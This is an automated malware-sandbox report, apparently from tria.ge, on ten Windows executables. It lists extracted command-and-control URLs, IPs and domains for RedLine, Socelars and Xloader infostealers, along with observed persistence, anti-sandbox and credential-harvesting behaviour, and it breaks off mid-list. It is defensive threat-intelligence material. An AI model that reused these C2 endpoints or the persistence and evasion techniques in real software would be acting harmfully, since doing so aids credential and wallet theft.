Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
022e3c30a1...66.exe
windows11_x64
10022e3c30a1...66.exe
windows10_x64
1022e3c30a1...66.exe
windows10_x64
104d27dca0a1...ef.exe
windows11_x64
104d27dca0a1...ef.exe
windows10_x64
104d27dca0a1...ef.exe
windows10_x64
10578a3a7a2b...b3.exe
windows11_x64
10578a3a7a2b...b3.exe
windows10_x64
10578a3a7a2b...b3.exe
windows10_x64
109c4880a98c...82.exe
windows11_x64
109c4880a98c...82.exe
windows10_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows11_x64
10a1dad4a83d...c4.exe
windows10_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows11_x64
10acf1b7d80f...e0.exe
windows10_x64
10acf1b7d80f...e0.exe
windows10_x64
10cbf31d825a...d2.exe
windows11_x64
10cbf31d825a...d2.exe
windows10_x64
10cbf31d825a...d2.exe
windows10_x64
10db76a117db...12.exe
windows11_x64
10db76a117db...12.exe
windows10_x64
10db76a117db...12.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows11_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10f2196668f4...cb.exe
windows11_x64
10f2196668f4...cb.exe
windows10_x64
10f2196668f4...cb.exe
windows10_x64
10Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
1227s -
max time network
1250s -
platform
windows11_x64 -
resource
win11 -
submitted
08/11/2021, 16:12
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win11
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-de-20211014
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win11
Behavioral task
behavioral5
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral6
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-de-20211014
Behavioral task
behavioral7
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win11
Behavioral task
behavioral8
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-de-20211014
Behavioral task
behavioral10
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win11
Behavioral task
behavioral11
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211104
Behavioral task
behavioral12
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-de-20211014
Behavioral task
behavioral13
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win11
Behavioral task
behavioral14
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-de-20211104
Behavioral task
behavioral16
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win11
Behavioral task
behavioral17
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral18
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-de-20211104
Behavioral task
behavioral19
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win11
Behavioral task
behavioral20
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-de-20211104
Behavioral task
behavioral22
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win11
Behavioral task
behavioral23
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-en-20211104
Behavioral task
behavioral24
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-de-20211104
Behavioral task
behavioral25
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win11
Behavioral task
behavioral26
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-en-20211104
Behavioral task
behavioral27
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-de-20211104
Behavioral task
behavioral28
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win11
Behavioral task
behavioral29
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-en-20211104
Behavioral task
behavioral30
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-de-20211104
General
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
Chris
194.104.136.5:46013
Extracted
redline
media18
91.121.67.60:2151
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2292 4884 rundll32.exe 19 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral4/memory/5560-332-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5580-359-0x0000000005240000-0x0000000005858000-memory.dmp family_redline behavioral4/memory/5580-327-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/5560-326-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5580-325-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/6116-370-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1cb-205.dat family_socelars behavioral4/files/0x000100000002b1cb-235.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 9 IoCs
description pid Process procid_target PID 840 created 1952 840 WerFault.exe 80 PID 5728 created 4648 5728 WerFault.exe 196 PID 1816 created 4828 1816 WerFault.exe 109 PID 4284 created 5232 4284 WerFault.exe 138 PID 5952 created 3552 5952 WerFault.exe 146 PID 3668 created 904 3668 WerFault.exe 142 PID 4336 created 468 4336 WerFault.exe 171 PID 5680 created 3104 5680 WerFault.exe 110 PID 2500 created 4896 2500 WerFault.exe 107 -
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral4/memory/904-478-0x0000000002230000-0x0000000002305000-memory.dmp family_vidar -
Xloader Payload 1 IoCs
resource yara_rule behavioral4/memory/5792-442-0x0000000002EC0000-0x0000000002EE9000-memory.dmp xloader -
resource yara_rule behavioral4/files/0x000300000002b1ab-157.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-161.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-159.dat aspack_v212_v242 behavioral4/files/0x000300000002b1ab-156.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bc-155.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bc-154.dat aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WLKX0D0H5 = "C:\\Program Files (x86)\\Y8pyhfft\\lnz8vvkdnpkx.exe" wlanext.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run wlanext.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 30 4648 cmd.exe 41 4648 cmd.exe 46 4648 cmd.exe 57 4648 cmd.exe 59 4648 cmd.exe 81 4648 cmd.exe 92 4648 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 42 IoCs
pid Process 1344 setup_installer.exe 1952 setup_install.exe 2952 Tue192762f1cd058ddf8.exe 5056 Tue19879c4c0e.exe 3988 Tue19761b3b8d9d.exe 3304 Tue19411ac950924ec3f.exe 4948 Tue195c40958f528163.exe 4840 Tue19325eb008c0b950.exe 4828 Tue19c06f159e0ec.exe 4648 Tue19b4ef3b53293fe.exe 3316 Tue193858933525b62.exe 4896 Tue19c1338f41ab.exe 2520 Tue19f51bcd77a.exe 3104 Tue19150ee2be694c8a4.exe 3812 Tue1969586bcbf58493.exe 4452 Tue1993b3f72c.exe 3332 Tue19c78ded4d176ac.exe 3852 Tue19879c4c0e.tmp 5188 Tue19879c4c0e.exe 5404 Tue19879c4c0e.tmp 5684 hz2zZEE1IO8UL8KkUIl_DiwJ.exe 5740 8274515.exe 5552 Tue19f51bcd77a.exe 5580 Tue195c40958f528163.exe 5560 Tue19761b3b8d9d.exe 6012 ~Xy1GPomKV09sC.Exe 5832 Tue19f51bcd77a.exe 2052 4775154.exe 440 bogAMCgr_ceyHDpTDqaFFCso.exe 5232 lmuaIti549S4IlfLGjOQ62Vi.exe 6116 Tue19f51bcd77a.exe 4684 OXLD9voH55f6gEm9L6axlvDX.exe 904 PzZpKoEf4kqLrhhG_T7hkMOE.exe 5384 dKb7nc_82MUnYJcIwvnENgPK.exe 3552 Xhhrp4rIfn8tBtFfUngVP_kE.exe 2288 6218320.exe 5948 control.exe 5960 435056.exe 3504 8581712.exe 1540 RxAPuFNW.exe 4832 WinHoster.exe 2564 lnz8vvkdnpkx.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4775154.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4775154.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OXLD9voH55f6gEm9L6axlvDX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OXLD9voH55f6gEm9L6axlvDX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6218320.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6218320.exe -
Loads dropped DLL 13 IoCs
pid Process 1952 setup_install.exe 1952 setup_install.exe 1952 setup_install.exe 1952 setup_install.exe 1952 setup_install.exe 3852 Tue19879c4c0e.tmp 5404 Tue19879c4c0e.tmp 468 rundll32.exe 4700 msiexec.exe 4700 msiexec.exe 6000 rundll32.exe 6000 rundll32.exe 3572 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 435056.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6218320.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4775154.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OXLD9voH55f6gEm9L6axlvDX.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 4 ipinfo.io 37 ipinfo.io 105 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2052 4775154.exe 4684 OXLD9voH55f6gEm9L6axlvDX.exe 2288 6218320.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4948 set thread context of 5580 4948 Tue195c40958f528163.exe 127 PID 3988 set thread context of 5560 3988 Tue19761b3b8d9d.exe 128 PID 2520 set thread context of 6116 2520 Tue19f51bcd77a.exe 135 PID 440 set thread context of 3220 440 bogAMCgr_ceyHDpTDqaFFCso.exe 29 PID 5792 set thread context of 3220 5792 wlanext.exe 29 -
Drops file in Program Files directory 6 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe Explorer.EXE File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe dKb7nc_82MUnYJcIwvnENgPK.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe dKb7nc_82MUnYJcIwvnENgPK.exe File opened for modification C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe wlanext.exe File opened for modification C:\Program Files (x86)\Y8pyhfft Explorer.EXE File created C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe Explorer.EXE -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 5156 1952 WerFault.exe 80 3236 4648 WerFault.exe 102 2264 4828 WerFault.exe 109 6028 3552 WerFault.exe 146 5648 5232 WerFault.exe 138 416 3104 WerFault.exe 110 3448 4896 WerFault.exe 107 -
Checks processor information in registry 2 TTPs 51 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4508 schtasks.exe 2620 schtasks.exe -
Enumerates system info in registry 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 6060 taskkill.exe 5224 taskkill.exe -
description ioc Process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 wlanext.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs 